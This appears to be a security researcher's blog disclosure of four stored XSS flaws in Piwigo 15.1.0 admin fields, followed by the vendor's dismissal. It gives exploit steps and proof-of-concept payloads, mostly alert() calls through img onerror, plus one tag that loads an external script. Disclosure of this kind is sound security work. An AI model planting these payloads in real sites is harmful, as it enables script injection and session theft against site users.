Post Image

Multiple Stored XSS Vulnerabilities in Piwigo 15.1.0

27 Nov 2024   |   ALI İLTIZAR   |   Reading Time: 4 min   |   Views: 115   |   Updated: 27 Nov 2024

Vendor Response

During the disclosure process for the stored XSS vulnerabilities in Piwigo 15.1.0, the development team provided the following response:

"Adding HTML in a photo description is not a security issue. Only administrators can do it. Administrators can do much more intrusive actions. As long as only administrators can do it, it's not a bug."

"The only reason why we would remove HTML from user input for administrators would be to avoid such false security reports. There is absolutely no security reason to do it. Only to get less useless reports like this.

...

I don't see any security issue here."


Introduction

Piwigo, a popular photo gallery application, has been identified to contain several stored Cross-Site Scripting (XSS) vulnerabilities in version 15.1.0. These vulnerabilities pose a significant security risk as they allow attackers to inject malicious scripts into various fields, potentially compromising user data and the application's integrity. This blog post will outline the discovered vulnerabilities, their impact, and remediation strategies.


Vulnerabilities Identified

1. Photo Properties Stored XSS

The first vulnerability is in the Photo Properties section under /admin.php?page=photo-1-properties. Malicious payloads injected into fields like Title, Author, or Description are executed on any page where the properties are displayed.

  • Steps to Exploit:
    1. Log in as an administrator.
    2. Navigate to /admin.php?page=photo-1-properties.
    3. Upload an image and edit its properties.
    4. Insert the payload:
      "><img src=x onerror=alert(1)>
    5. Save the settings and visit the image page (e.g., /picture.php?/1/category/6) to trigger the XSS.

2. Tags Management Stored XSS

The second vulnerability resides in the Tags Management section at /admin.php?page=tags. When creating a tag with a malicious payload, the script executes when the tag is displayed.

  • Steps to Exploit:
    1. Log in as an administrator.
    2. Navigate to /admin.php?page=tags.
    3. Create a tag with the payload:
      "><img src=x onerror=alert('tag-xss')>
    4. Assign the tag to an image and view the image page to observe the execution.

3. Gallery Title Stored XSS

On the configuration page (/admin.php?page=configuration&section=main), the "Gallery Title" input field is vulnerable to XSS.

  • Payloads:
     
    iltosec gallery</title><img src=x onerror=alert('example.com')>
     
    </title><script src="https://google.com/x.js"></script>
    These payloads execute as scripts and can load external malicious resources.

4. Page Banner Stored XSS in "Elegant" Theme

In the "Elegant" theme, the "Page Banner" field renders raw HTML, enabling attackers to inject scripts.

  • Payload:
     
    <p>Welcome to my photo gallery</p> <img src=x onerror=alert('example.com')>
    The malicious script is executed when the page loads, leading to arbitrary code execution.

Impact of the Vulnerabilities

The identified vulnerabilities can lead to severe consequences, including:

  • Session Hijacking: Theft of user cookies and session tokens.
  • Defacement: Unauthorized changes to the website's appearance.
  • Injection of Malicious Scripts: Loading external scripts for further exploitation or malware delivery.
  • Data Theft: Access to sensitive information from logged-in users or administrators.

Screenshots

Below are screenshots demonstrating the vulnerabilities:

Admin Panel XSS in Photo Properties 

Tag Field XSS

Gallery Title XSS 

Page Banner XSS